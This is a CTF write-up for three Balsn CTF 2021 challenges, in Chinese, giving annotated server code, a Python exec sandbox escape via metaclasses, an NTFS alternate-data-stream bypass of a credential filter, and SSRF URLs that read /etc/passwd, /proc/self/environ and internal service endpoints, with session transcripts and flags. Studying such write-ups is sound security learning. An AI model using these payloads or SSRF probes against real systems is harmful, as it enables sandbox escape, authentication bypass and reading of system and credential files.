balsn-2021-writeup
戰績
Metaeasy
題目
server code
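class MasterMetaClass(type):
    """Metaclass whose classes carry the flag-printing method.

    ``__new__`` adds a ``getFlag`` function to the class namespace, drops every
    attribute whose name starts with ``__`` and renames the remaining ones to
    ``IWant<NAME>Plz``.  ``__init__`` is the only guard: it aborts any attempt
    to finish building a class with this metaclass.

    The indentation of this listing was lost on the page and is restored here.
    """

    def __new__(cls, class_name, class_parents, class_attr):
        """Build the class with the renamed namespace (getFlag included)."""
        def getFlag(self):
            print('Here you go, my master')
            with open('flag') as f:
                print(f.read())

        # Mutates the dict passed in by the caller: the 'getFlag' key stays
        # visible in the caller's dict after this call returns.
        class_attr[getFlag.__name__] = getFlag
        # Dunder names are dropped, so a caller-supplied '__init__' in the class
        # body never reaches the new class; everything else is renamed.
        class_attr = {
            'IWant' + name.upper() + 'Plz': value
            for name, value in class_attr.items()
            if not name.startswith('__')
        }
        return super().__new__(cls, class_name, class_parents, class_attr)

    def __init__(*argv):
        """Reject class creation; runs after ``__new__`` has built the class."""
        print('Bad guy! No Flag !!')
        # Raising a str is itself a TypeError in Python 3, so creation still
        # aborts. NOTE(review): this guard sits on the metaclass's __init__,
        # which a subclass of the metaclass can override; a check that must
        # hold belongs in __new__, before getFlag is attached.
        raise 'Illegal'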
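class BalsnMetaClass(type):
    """Metaclass for guest classes: attaches a ``getFlag`` that only refuses.

    The page lost this listing's indentation, the escaped apostrophe in the
    message, and left HTML highlighting markup in it; all three are repaired.
    """

    def getFlag(self):
        """Print the refusal message; never touches the flag file."""
        print("You're not Master! No Flag !!")

    def __new__(cls, class_name, class_parents, class_attr):
        """Create the class, then set ``getFlag`` on it as a class attribute."""
        newclass = super().__new__(cls, class_name, class_parents, class_attr)
        # Stored under the function's own name, i.e. 'getFlag'.
        setattr(newclass, cls.getFlag.__name__, cls.getFlag)
        return newclass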
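def secure_vars(s):
    """Return ``vars(s)`` without the entries whose name starts with ``__``.

    Exposed to sandboxed code as ``vars`` in place of the builtin.  The filter
    is a name-prefix test only; it does not inspect the values.
    (Indentation restored; the page had flattened it.)
    """
    return {
        name: value
        for name, value in vars(s).items()
        if not name.startswith('__')
    }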
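# Globals handed to exec() for user-supplied method bodies: an allow-list of
# names the sandboxed code may use.
#
# NOTE(review): an allow-list of globals is not a security boundary. `type`
# and both metaclasses are exposed, so sandboxed code can construct new
# classes, which is the route the write-up on this page takes.
safe_dict = {
    'BalsnMetaClass' : BalsnMetaClass,
    'MasterMetaClass' : MasterMetaClass,
    'False' : False,
    'True' : True,
    'abs' : abs,
    'all' : all,
    'any' : any,
    'ascii' : ascii,
    'bin' : bin,
    'bool' : bool,
    'bytearray' : bytearray,
    'bytes' : bytes,
    'chr' : chr,
    'complex' : complex,
    'dict' : dict,
    'dir' : dir,
    'divmod' : divmod,
    'enumerate' : enumerate,
    'filter' : filter,
    'float' : float,
    'format' : format,
    'hash' : hash,
    'help' : help,
    'hex' : hex,
    'id' : id,
    'int' : int,
    'iter' : iter,
    'len' : len,
    'list' : list,
    'map' : map,
    'max' : max,
    'min' : min,
    'next' : next,
    'oct' : oct,
    'ord' : ord,
    'pow' : pow,
    'print' : print,
    'range' : range,
    'reversed' : reversed,
    'round' : round,
    'set' : set,
    'slice' : slice,
    'sorted' : sorted,
    'str' : str,
    'sum' : sum,
    'tuple' : tuple,
    'type' : type,
    # The builtin vars() is replaced by the dunder-filtering wrapper.
    'vars' : secure_vars,
    'zip' : zip,
    # The page shows this key as 'builtins'; presumably the underscores were
    # lost in rendering. exec() only honours '__builtins__': when that key is
    # absent it inserts the full builtins module into the globals, which would
    # make the allow-list above meaningless (open() would be reachable).
    '__builtins__':None
}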
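def createMethod(code):
    """Turn a user-supplied source string into a method that exec()s it.

    Returns ``None`` (after printing a message) when ``code`` is longer than
    45 characters; otherwise returns a one-argument function that runs the
    filtered code with ``safe_dict`` as globals and ``{'self': self}`` as
    locals.  (Indentation restored; the page had flattened it.)
    """
    # The length limit applies to the raw input, before characters are removed.
    if len(code) > 45:
        print('Too long!! Bad Guy!!')
        return
    # Deny-list: these characters are deleted, not rejected. A deny-list on
    # characters does not stop the same text being rebuilt at run time (the
    # write-up recreates '_' from a byte escape).
    for x in ' _$#@~':
        code = code.replace(x,'')

    def wrapper(self):
        # SECURITY: exec() on untrusted input. The only containment is the
        # contents of safe_dict; treat this as unsafe outside a throwaway,
        # isolated process.
        exec(code, safe_dict, {'self' : self})

    return wrapper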
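def setName(pattern):
    """Prompt until the user enters a purely alphabetic name, then return it.

    ``pattern`` is only used in the prompt text ('attribute' or 'method').
    ``str.isalpha`` rejects the empty string and anything containing digits,
    underscores or punctuation, so a dunder name cannot be entered here.
    (Indentation restored; the page had flattened it.)
    """
    while True:
        name = input(f'Give me your {pattern} name :')
        if name.isalpha():
            return name
        print('Illegal Name…')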
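def setAttribute(cls):
    """Ask for an attribute name and value and set them on ``cls``.

    The name comes from ``setName`` (alphabetic only); the value must pass
    ``str.isalnum`` and is stored as the string the user typed.
    (Indentation restored; the page had flattened it.)
    """
    attrName = setName('attribute')
    while True:
        attrValue = input(f'Give me your value:')
        if attrValue.isalnum():
            break
        print('Illegal value…')
    setattr(cls, attrName, attrValue)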
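def setMethod(cls):
    """Ask for a method name and a line of code and attach it to ``cls``.

    The code string goes through ``createMethod``. When that returns ``None``
    (input too long), ``None`` is what gets set on the class under the chosen
    name.  (Indentation restored; the page had flattened it.)
    """
    methodName = setName('method')
    code = input(f'Give me your function:')
    setattr(cls, methodName, createMethod(code))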
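def getAttribute(obj):
    """Print one non-callable, non-dunder attribute of ``obj`` chosen by the user.

    The page lost this listing's indentation and the escaped apostrophes in
    two messages (leaving invalid string literals); both are repaired here.
    """
    # Only names that dir() reports, are not callable and do not start with
    # '__' may be inspected.
    attrs = [attr for attr in dir(obj) if not callable(getattr(obj, attr)) and not attr.startswith("__")]
    x = input("Please enter the attribute's name :")
    if x not in attrs:
        print(f"You can't access the attribute {x}")
        return
    try:
        print(f'{x}: {getattr(obj, x)}')
    except:
        # Bare except kept as on the page: any failure while reading or
        # formatting the attribute is reported and swallowed.
        print("Something went wrong in your attribute…")
        return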
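def callMethod(cls, obj):
    """Call one callable, non-dunder attribute of ``obj`` chosen by the user.

    The page lost this listing's indentation and the escaped apostrophes in
    two messages, and mangled the call expression; all are repaired here.
    """
    attrs = [attr for attr in dir(obj) if callable(getattr(obj, attr)) and not attr.startswith("__")]
    x = input("Please enter the method's name :")
    if x not in attrs:
        print(f"You can't access the method {x}")
        return
    try:
        # The page prints an ellipsis character; the session transcript on the
        # same page shows three dots, which is what is used here.
        print(f'calling method {x}...')
        # The page shows `cls.dictx`, which looks like `cls.__dict__[x](obj)`
        # after a Markdown renderer consumed the underscores and the
        # `[x](obj)` link syntax. NOTE(review): reconstructed; it matches the
        # transcript, where state set on `self` persists between calls.
        cls.__dict__[x](obj)
        print('done')
    except:
        # Bare except kept as on the page: every error raised by the user's
        # code is reduced to this one message.
        print('Something went wrong in your method…')
        return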
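class Guest(metaclass = BalsnMetaClass):
    """Empty class handed to the user; BalsnMetaClass adds ``getFlag`` to it.

    User-chosen attributes and methods are set on this class by the menu loop.
    (Indentation restored; the page had flattened it.)
    """
    pass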
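# The page shows `if name == 'main':`; the underscores of the usual
# `__name__ == '__main__'` guard were evidently lost in rendering, as was the
# indentation of the whole block.
if __name__ == '__main__':
    print(f'Welcome!!We have prepared a class named "Guest" for you')

    # Phase 1: at most three successful edits of the Guest class.
    cnt = 0
    while cnt < 3:
        cnt += 1
        print('1. Add attribute')
        print('2. Add method')
        print('3. Finish')
        x = input("Option ? :")
        if x == "1":
            setAttribute(Guest)
        elif x == "2":
            setMethod(Guest)
        elif x == "3":
            break
        else:
            print("invalid input.")
            # An invalid option does not use up one of the three turns.
            cnt -= 1

    print("Well Done! We Create an instance for you !")
    obj = Guest()

    # Phase 2: at most three inspections or calls on the instance. Each call
    # runs user code through exec() inside callMethod.
    cnt = 0
    while cnt < 3:
        cnt += 1
        print('1. Inspect attribute')
        print('2. Using method')
        print('3. Exit')
        x = input("Option ? :")
        if x == "1":
            getAttribute(obj)
        elif x == "2":
            callMethod(Guest, obj)
        elif x == "3":
            print("Okay…exit…")
            break
        else:
            print("invalid input.")
            cnt -= 1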
目標
使用MasterMetaClass這個MetaClass建立一個class並調用裡面的IWantGETFLAGPlz func
限制
- payload 不可超過三行
- payload 一行要低於45字
- payload 不可含 [' ', '_', '$', '#', '@', '~'] 字元(createMethod 會直接把這些字元移除)
payload
a=b'\x5f\x5f'.decode();self.i=a+'init'+a
self.d=['',(MasterMetaClass,),{self.i:print}]
type(*self.d)('',(),{})().IWantGETFLAGPlz()
root@jimmyGW:~# nc metaeasy.balsnctf.com 19092
Welcome!!We have prepared a class named "Guest" for you
1. Add attribute
2. Add method
3. Finish
Option ? :2
Give me your method name :aaa
Give me your function:a=b'\x5f\x5f'.decode();self.i=a+'init'+a
1. Add attribute
2. Add method
3. Finish
Option ? :2
Give me your method name :bbb
Give me your function:self.d=['',(MasterMetaClass,),{self.i:print}]
1. Add attribute
2. Add method
3. Finish
Option ? :2
Give me your method name :ccc
Give me your function:type(*self.d)('',(),{})().IWantGETFLAGPlz()
Well Done! We Create an instance for you !
1. Inspect attribute
2. Using method
3. Exit
Option ? :2
Please enter the method's name :aaa
calling method aaa...
done
1. Inspect attribute
2. Using method
3. Exit
Option ? :2
Please enter the method's name :bbb
calling method bbb...
done
1. Inspect attribute
2. Using method
3. Exit
Option ? :2
Please enter the method's name :ccc
calling method ccc...
() {'getFlag': <function MasterMetaClass.__new__.<locals>.getFlag at 0x7f06a60c2550>}
Here you go, my master
BALSN{Metaclasses_Are_Deeper_Magic_Than_99%_Of_Users_Should_Ever_Worry_About._If_You_Wonder_Whether_You_Need_Them,_You_Don't.-Tim_Peters_DE8560A2}
done
flag
BALSN{Metaclasses_Are_Deeper_Magic_Than_99%_Of_Users_Should_Ever_Worry_About._If_You_Wonder_Whether_You_Need_Them,_You_Don't.-Tim_Peters_DE8560A2}
參考
DarkKnight
題目
server code
import os
import shutil
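# Per-run working directory with a random 32-hex-digit suffix.
# As shown on the page the literal has single backslashes, and `\U` in a
# non-raw string is a syntax error (the doubled backslashes were presumably
# lost in rendering); a raw f-string keeps the path readable and valid.
base_dir = rf"C:\Users\balsnctf\Documents\Dark Knight\tmp-{os.urandom(16).hex()}"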
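def init():
    """Create the per-run directory, enter it and seed two credential files.

    Each credential file is named after its pin and holds
    ``username\\npassword``.  (Indentation restored and HTML highlighting
    markup removed; the page had both problems.)
    """
    os.mkdir(base_dir)
    # All later file operations use bare relative names inside this directory.
    os.chdir(base_dir)
    for pin, content in (("39671", "alice\nalice1025"), ("683077", "bob\nbob0105a")):
        with open(pin, "w") as f:
            f.write(content)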
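def password_manager():
    """Store a username/password pair in a file named after a user-chosen pin.

    The pin, username and password are each limited to 100 characters and to
    bytes 0x20-0x7e.  The pin is used directly as a file name in the current
    directory.  (Indentation restored and HTML highlighting markup removed.)
    """
    print("use a short pin code to achieve fast login!!")
    while True:
        pin = input("enter a pin code > ")
        if len(pin) > 100:
            print("too long...")
            continue
        # Deny-list for path tricks. NOTE(review): ':' is not rejected. On
        # NTFS a name of the form `file:stream` addresses an alternate data
        # stream of `file`, which is the route the write-up on this page uses.
        # An allow-list (for example `pin.isdigit()`) would close this.
        if "\\" in pin or "/" in pin or ".." in pin or "*" in pin:
            print("what do you want to do?(¬_¬)")
            continue
        flag = True
        for c in pin.encode("utf8"):
            if c > 0x7e or c < 0x20:
                print("printable chars only!!")
                flag = False
                break
        if flag:
            break

    while True:
        username = input("enter username > ")
        if len(username) > 100:
            print("too long...")
            continue
        # As shown on the page `flag` was not reset here, so one rejected
        # username left the loop unable to accept any later input.
        flag = True
        for c in username.encode("utf8"):
            if c > 0x7e or c < 0x20:
                print("printable chars only!!")
                flag = False
                break
        if flag:
            break

    while True:
        password = input("enter password > ")
        if len(password) > 100:
            print("too long...")
            continue
        flag = True  # same reset as for the username loop
        for c in password.encode("utf8"):
            if c > 0x7e or c < 0x20:
                print("printable chars only!!")
                flag = False
                break
        if flag:
            break

    # Nothing here rejects the username "admin"; that check is left entirely
    # to safety_guard(), which runs later and only sees what os.listdir lists.
    try:
        with open(pin, "w") as f:
            f.write(username + "\n" + password)
        print("saved!!")
    except OSError:
        print("pin is invalid!!")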
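def safety_guard():
    """Delete every credential file in the current directory that looks unsafe.

    A file is kept only if it holds exactly two newline-separated fields,
    both non-empty and alphanumeric, and the first field is not ``"admin"``.
    (Indentation restored and HTML highlighting markup removed.)
    """
    # The page prints an ellipsis character here; the session transcript on
    # the same page shows three dots, which is what is used.
    print("safety guard activated. will delete all unsafe credentials hahaha...")
    delete_file = []
    # NOTE(review): only names returned by os.listdir(".") are checked, each
    # opened by its plain name. Anything stored where a directory listing does
    # not show it (the write-up uses an NTFS alternate data stream) is never
    # inspected.
    for pin in os.listdir("."):
        with open(pin, "r") as f:
            data = f.read().split("\n")
        safe = (
            len(data) == 2
            and len(data[0]) != 0
            and len(data[1]) != 0
            and data[0].isalnum()
            and data[1].isalnum()
            and data[0] != "admin"
        )
        # Removal happens after the file is closed.
        if not safe:
            os.remove(pin)
            delete_file.append(pin)
    print(f"finished. delete {len(delete_file)} unsafe credentials: {delete_file}")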
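def fast_login():
    """Read a credential file by pin and return ``(username, password)``.

    Returns ``(None, None)`` when the file does not exist or does not hold
    exactly two newline-separated fields.  (Indentation restored and HTML
    highlighting markup removed.)
    """
    while True:
        pin = input("enter a pin code > ")
        if len(pin) > 100:
            print("too long...")
            continue
        # Same deny-list as password_manager minus '*'; ':' is accepted here
        # as well.
        if "\\" in pin or "/" in pin or ".." in pin:
            print("what do you want to do?(¬_¬)")
            continue
        flag = True
        for c in pin.encode("utf8"):
            if c > 0x7e or c < 0x20:
                print("printable chars only!!")
                flag = False
                break
        if flag:
            break

    # NOTE(review): the stored fields are returned as-is. The username is not
    # re-validated here (no "admin" or isalnum check, unlike normal_login);
    # this path relies on safety_guard() having vetted the file beforehand.
    try:
        with open(pin, "r") as f:
            data = f.read().split("\n")
        if len(data) != 2:
            print("unknown error happened??")
            return None, None
        return data[0], data[1]
    except FileNotFoundError:
        # Only a missing file is handled; other errors from open() propagate
        # to the caller.
        print("this pin code is not registered.")
        return None, None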
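def normal_login():
    """Prompt for a username and password and return them as a tuple.

    Both must be at most 100 characters and alphanumeric, and the username
    ``"admin"`` is refused outright.  No stored credential is consulted.
    (Indentation restored and HTML highlighting markup removed.)
    """
    while True:
        username = input("enter username > ")
        if len(username) > 100:
            print("too long...")
        elif not username.isalnum():
            print("strange username, huh?")
        elif username == "admin":
            print("no you are definitely not (╬ Ò ‸ Ó)")
        else:
            break

    while True:
        password = input("enter password > ")
        if len(password) > 100:
            print("too long...")
        elif not password.isalnum():
            print("strange password, huh?")
        else:
            break

    return username, password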
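def login():
    """Run the credential clean-up, then the login menu; admin gets the flag.

    ``safety_guard()`` is called once, before any login attempt.
    (Indentation restored and HTML highlighting markup removed.)
    """
    safety_guard()
    while True:
        print("1. fast login")
        print("2. normal login")
        print("3. exit")
        x = input("enter login type > ")
        if x == "1":
            username, password = fast_login()
        elif x == "2":
            username, password = normal_login()
        elif x == "3":
            print("bye-bye~")
            return
        else:
            print("invalid input.")
            continue

        if username is not None and password is not None:
            print(f"hello, {username}.")
            # The admin decision rests on the returned username alone; the
            # password is never compared with anything in this function.
            if username == "admin":
                while True:
                    x = input("do you want the flag? (y/n): ")
                    if x == "n":
                        print("OK, bye~")
                        return
                    elif x == "y":
                        break
                    else:
                        print("invalid input.")
                while True:
                    x = input("beg me: ")
                    if x == "plz":
                        print("ok, here is your flag: BALSN{flag is here ...}")
                        break
            # NOTE(review): the nesting of this return is reconstructed (the
            # page lost all indentation); it is placed so that any successful
            # login goes back to the main menu, as the transcript shows for
            # admin. Confirm against the original source.
            return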
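def main():
    """Set up the working directory, run the main menu, then clean up.

    (Indentation restored and HTML highlighting markup removed.)
    """
    init()
    try:
        while True:
            print("1. passord manager")
            print("2. login")
            print("3. exit")
            x = input("what do you want to do? > ")
            if x == "1":
                password_manager()
            elif x == "2":
                login()
            elif x == "3":
                print("bye-bye~")
                break
            else:
                print(f"invalid input: {x}")
    except KeyboardInterrupt:
        print("bye-bye~")
    except:
        # Bare except kept as on the page: any other failure ends the session
        # with a generic message, and the clean-up below still runs.
        print("unexpected error occured.")
    # Leave the per-run directory before deleting it.
    os.chdir("../")
    shutil.rmtree(base_dir)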
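# The page shows `if name == "main":`; the underscores of the usual
# `__name__ == "__main__"` guard were evidently lost in rendering.
if __name__ == "__main__":
    main()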
目標
使用login選項成功登入admin
限制
- 用 normal_login 會直接被擋
- login 前,所有在 passord manager 所建立的 fast_login 檔若包含 'admin' 會被刪
- 做 passord manager 時 pin(filename) 不可包含 ['\', '/', '..', '*'] 字串
payload
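因為 server 是 Windows(NTFS),而 pin 的過濾沒有擋 ':',所以可以用 alternate data stream(ADS)繞過,如:C:\user\docs\somefile.ext:alternate_stream_name。以 39671:aaa 當 pin 時,資料會寫進既有檔案 39671 的另一個 stream;os.listdir 不會列出 stream,所以 safety_guard 只檢查到 39671 的主內容,不會刪掉它。修補方向:pin 改用白名單(例如只允許數字),並在 fast_login 讀出資料後再驗證一次 username。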
root@jimmyGW:~# nc darkknight.balsnctf.com 8084
1. passord manager
2. login
3. exit
what do you want to do? > 1
use a short pin code to achieve fast login!!
enter a pin code > 39671:aaa
enter username > admin
enter password > aaaa
saved!!
1. passord manager
2. login
3. exit
what do you want to do? > 2
safety guard activated. will delete all unsafe credentials hahaha...
finished. delete 0 unsafe credentials: []
1. fast login
2. normal login
3. exit
enter login type > 1
enter a pin code > 39671:aaa
hello, admin.
do you want the flag? (y/n): y
beg me: plz
ok, here is your flag: BALSN{however_Admin_passed_the_Dark_knight_with_hiding_behind_Someone}
1. passord manager
2. login
3. exit
what do you want to do? > 3
bye-bye~
flag
BALSN{however_Admin_passed_the_Dark_knight_with_hiding_behind_Someone}
參考
Introduction to ADS – Alternate Data Streams
DarkKnight
題目
解題
進來看到這個
試著 http://proxy.balsnctf.com/query?site=http://www.google.com
試著 ssrf http://proxy.balsnctf.com/query?site=file:///etc/passwd
試著 http://proxy.balsnctf.com/query?site=file:///proc/self/environ
試著 http://proxy.balsnctf.com/query?site=file:///proc/net/tcp
試著 http://proxy.balsnctf.com/query?site=http://127.0.0.1:15000
試著 http://proxy.balsnctf.com/query?site=http://127.0.0.1:15000/stats
試著 http://proxy.balsnctf.com/query?site=http://0X0A2C03F0:39307
試著 http://proxy.balsnctf.com/query?site=http://0X0A2C03F0:39307/flag
炸
試著 http://proxy.balsnctf.com/query?site=http://0X0A2C03F0:39307//flag
過
flag
BALSN{default_istio_service_mesh_envoy_configurations}